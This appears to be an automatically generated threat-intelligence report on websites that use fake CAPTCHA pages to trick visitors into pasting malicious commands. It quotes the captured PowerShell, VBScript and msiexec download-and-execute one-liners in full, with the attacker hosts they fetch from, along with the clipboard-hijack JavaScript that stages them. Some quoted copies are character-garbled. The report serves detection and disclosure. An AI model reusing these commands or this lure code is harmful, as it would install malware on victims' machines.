Threat Intelligence Report

📅 December 16, 2025 🕒 Generated: 2025-12-16 02:46:45 🔍 Sites Analyzed: 45
⬇️ Download JSON Report 📁 View All Reports on GitHub
🌐
45
Total Sites Analyzed
⚠️
12
Malicious Sites
27.0% detection rate
💻
12
PowerShell Commands
📋
56
Clipboard Hijacks
📊
184
Avg Threat Score

Attack Pattern Analysis

11
High Risk Commands
56
Base64 Encoded
0
Obfuscated JS
10
Inline JS Redirects
0
External JS Chains
11
Redirect Follows
PowerShell Commands 12
Clipboard Hijacks 56
Base64 Encoded 56
CAPTCHA Elements 41
High Risk Commands 11
JS Redirects 10

Top Indicators/Keywords

robot (5) hidden (5) CAPTCHA Verification (3) I am not a robot (3) Robot (3) Verification (3) verification (3) verification-id (3) To better prove you are not a robot (3) verification_id (2) iex (2) Verification ID (2) exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator) (2) exec( (2) Command iine: [2]RemoveFiiesRemoving fiiesRemoveIniVaiuesRemoving INI fiies entriesRemoveODBCRemoving ODBC componentsSeifRegModuiesRegistering moduiesFiie: [i], Foider: [2]RemoveShortcutsRemoving shortcutsSeifUnregModuiesUnregistering moWY[�\�_`b�ceg��di�jimo�hpquruvwy{|}~������������������#�����-�&��)�������K ����.���aZ���^������z�����[�����A�������������� (1)

Malicious Sites Detected

Click on a site to view detailed analysis
https://odeon-gongen.com
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

💻 PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

🔍 Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://shinsenkaku-osaka.com
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

💻 PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$d='p.ps1';$y=$env:USERPROFILE+'\\\\Downloads\\\\'+$d;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://ghost.nestdns.com/files', $y);& $y;Remove-Item $y -Force;"`;
New-Object

🔍 Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$d='p.psi';$y=$env:USERPROFILE+'\\\\Downioads\\\\'+$d;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://ghost.nestdns.com/fiies', $y);& $y;Remove-Item $y -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://ghost.nestdns.com/files
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://178.159.11.216
73 indicators detected
Score: 618 PowerShell Clipboard Hijack
2
powershell
6
clipboard
3
captcha
2
base64
21
suspicious keywords
2
high risk

💻 PowerShell Commands 2

powershell -w h -ep Bypass -nop -c "$h='b.ps1';$n=$env:USERPROFILE+'\\\\Downloads\\\\'+$h;Start-Sleep 15;(New-Object Net.WebClient).DownloadFile('https://penguinpublishers.org/files/audio/', $n);& $n;Remove-Item $n -Force;"`;
New-Object

🔍 Suspicious Keywords 21

cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
command = `cmd.exe /c powersheii -w h -ep Bypass -nop -c "$h='b.psi';$n=$env:USERPROFILE+'\\\\Downioads\\\\'+$h;Start-Sieep i5;(New-Object Net.WebCiient).DownioadFiie('https://penguinpubiishers.org/fiies/audio/', $n);& $n;Remove-Item $n -Force;"`;
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://penguinpublishers.org/files/audio/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://aboutpearlharbor.org
66 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
3
base64
18
suspicious keywords

🔍 Suspicious Keywords 18

command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://hghlaw.com
66 indicators detected
Score: 544 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
3
base64
18
suspicious keywords

🔍 Suspicious Keywords 18

command = "msiexec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
exec /i https://shift-art.com/i23/cioudfiare/verify/humanverfification/cioudfiarechaiienge/CustomerID37832738/";
CAPTCHA Verification
Verification ID
verification id
Ray ID
ray id
I am not a robot
Robot
robot

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
https://shift-art.com/123/cloudflare/verify/humanverfification/cloudflarechallenge/CustomerID37832738/
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://knowledgemomentum-net.moneymaking-opportunities.com
66 indicators detected
Score: 541 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
18
suspicious keywords

🔍 Suspicious Keywords 18

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
http://95.164.53.115:5506/do.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://npaym.com
66 indicators detected
Score: 541 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
18
suspicious keywords

🔍 Suspicious Keywords 18

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
http://95.164.53.115:5506/do.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://airtrafficsolutions.com.au
66 indicators detected
Score: 541 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
18
suspicious keywords

🔍 Suspicious Keywords 18

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://95.i64.53.ii5:5506/do.vbs",0:h.Send:Execute h.ResponseText > "%temp%\do.tmp" && wscript //E:VBScript "%temp%\do.tmp"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 5

https://i.postimg.cc/k4zrz92z/111.png
http://95.164.53.115:5506/do.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent
https://${host}/favicon.ico`

📋 Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://www.bratusferramentas.grupomoltz.com.br/
42 indicators detected
Score: 371 PowerShell Clipboard Hijack
3
powershell
5
clipboard
7
captcha
3
base64
1
redirect follows
13
suspicious keywords
3
high risk

💻 PowerShell Commands 3

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing)
iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification
Verification ID
I am not a robot
robot
Robot
Verification
verification
verification-id
verification_id
Verify You Are Human

🌐 Extracted URLs 2

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
...k", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "0"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification ID: " const end = "''" const textToCopy = commandToRun setClipboardCopyData(textToCopy); } function showVerifyWindow() {...

🛰️ Redirect Follower Findings (1)

Source: inline_js
Method: base64_payload
iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content
Status: error: HTTPSConnectionPool(host='amazon-ny-gifts.com', port=443): Max retries exceeded with url: /shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt (Caused by NameResolutionError("HTTPSConnection(host
https://blessdayservices.org/up/
40 indicators detected
Score: 309 PowerShell Clipboard Hijack
3
powershell
5
clipboard
1
downloads
4
captcha
13
suspicious keywords
2
high risk

💻 PowerShell Commands 3

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;
iwr

🔍 Suspicious Keywords 13

CAPTCHA Verification
Verification Hash
I am not a robot
Robot
robot
Verification
verification
verification-id
verification_id
To better prove you are not a robot

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 4 entries (truncated for performance) 

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextA...
...ck", function (event) { event.preventDefault(); checkboxBtn.disabled = true; runClickedCheckboxEffects(); }); } } function runClickedCheckboxEffects() { hideCaptchaCheckbox(); setTimeout(function(){ showCaptchaLoading(); },500); setTimeout(function(){ showVerifyWindow(); },900) } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; checkboxBtnSpinner.style.animation = "spin 1s linear infinite"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.opacity = "0"; checkboxBtnSpinner.style.animation = "none"; setTimeout(function() { checkboxBtnSpinner.style.visibility = "hidden"; }, 500); } function hideCaptchaCheckbox() { checkboxBtn.style.visibility = "hidden"; checkboxBtn.style.opacity = "0"; } function showCaptchaCheckbox() { checkboxBtn.style.width = "100%"; checkboxBtn.style.height = "100%"; checkboxBtn.style.borderRadius = "2px"; checkboxBtn.style.margin = "21px 0 0 12px"; checkboxBtn.style.opacity = "1"; } function hideCaptchaCheckbox() { checkboxBtn.style.width = "4px"; checkboxBtn.style.height = "4px"; checkboxBtn.style.borderRadius = "50%"; checkboxBtn.style.marginLeft = "25px"; checkboxBtn.style.marginTop = "33px"; checkboxBtn.style.opacity = "0"; } function showCaptchaLoading() { checkboxBtnSpinner.style.visibility = "visible"; checkboxBtnSpinner.style.opacity = "1"; } function hideCaptchaLoading() { checkboxBtnSpinner.style.visibility = "hidden"; checkboxBtnSpinner.style.opacity = "0"; } function generateRandomNumber() { const min = 1000; const max = 9999; return Math.floor(Math.random() * (max - min + 1) + min).toString(); } function closeverifywindow() { verifywindow.style.display = "none"; verifywindow.style.visibility = "hidden"; verifywindow.style.opacity = "0"; showCaptchaCheckbox(); hideCaptchaLoading(); checkboxBtn.disabled = false; } function isverifywindowVisible() { return verifywindow.style.display !== "none" && verifywindow.style.display !== ""; } function setClipboardCopyData(textToCopy){ const tempTextArea = document.createElement("textarea"); tempTextArea.value = textToCopy; document.body.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); } function stageClipboard(commandToRun, verification_id){ const suffix = " # " const ploy = "✠''I am not a robot - reCAPTCHA Verification Hash: " const end = "''" const textToCopy = commandToRun + suffix + ploy + verification_id + end setClipboardCopyData(textToCopy); } function showVerifyWindow()...
https://82.146.62.232/
46 indicators detected
Score: 302 Fake CAPTCHA Redirect Chain
3
captcha
5
base64
1
redirects
1
redirect follows
4
suspicious keywords

🔍 Suspicious Keywords 4

exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
robot
exec(
hidden

🌐 Extracted URLs 15

https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/

🛰️ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
new Image().src='https://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5Njk1NzE4MQEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAEyMWUwMDI3Y2FiZGNhNzY0MTQyMTBlNTE0NDQwODFkZAExNzk2OTU3MTgxAS8BAQEC&k=6b7730d6d5d2c5de2228dddf7ec54647';
Status: ok
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address>
</body></html>
http://82.146.62.232/
46 indicators detected
Score: 302 Fake CAPTCHA Redirect Chain
3
captcha
5
base64
1
redirects
1
redirect follows
4
suspicious keywords

🔍 Suspicious Keywords 4

exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}eise if (n.appName == "Netscape"){rv = ii;re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)");if (re.exec(ua) != nuii){rv = parseFioat(RegExp.$i);}}}return rv;}})(window, document, navigator)
robot
exec(
hidden

🌐 Extracted URLs 15

https://svetvip.ru/
https://api.whatsapp.com/send?phone=79258627909
https://api.whatsapp.com/send?phone=79258627909
https://svetvip.ru/catalog/vstraivaemye_svetilniki/
https://svetvip.ru/catalog/trekovye_i_shinnye_svetilniki/

🛰️ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
new Image().src='http://svetvip.ru/bitrix/spread.php?s=QklUUklYX1NNX0FCVEVTVF91MgEBMTc5Njk1NzE4OAEvAQEBAkJJVFJJWF9TTV9TQUxFX1VJRAFlYWEyZGU5MWZmODA0NmQyNmU2NGVjZTZlYmIwYmI3MgExNzk2OTU3MTg4AS8BAQEC&k=9210cb1ae650755835be74d9c727c3da';
Status: ok
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access this resource.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at svetvip.ru Port 80</address>
</body></html>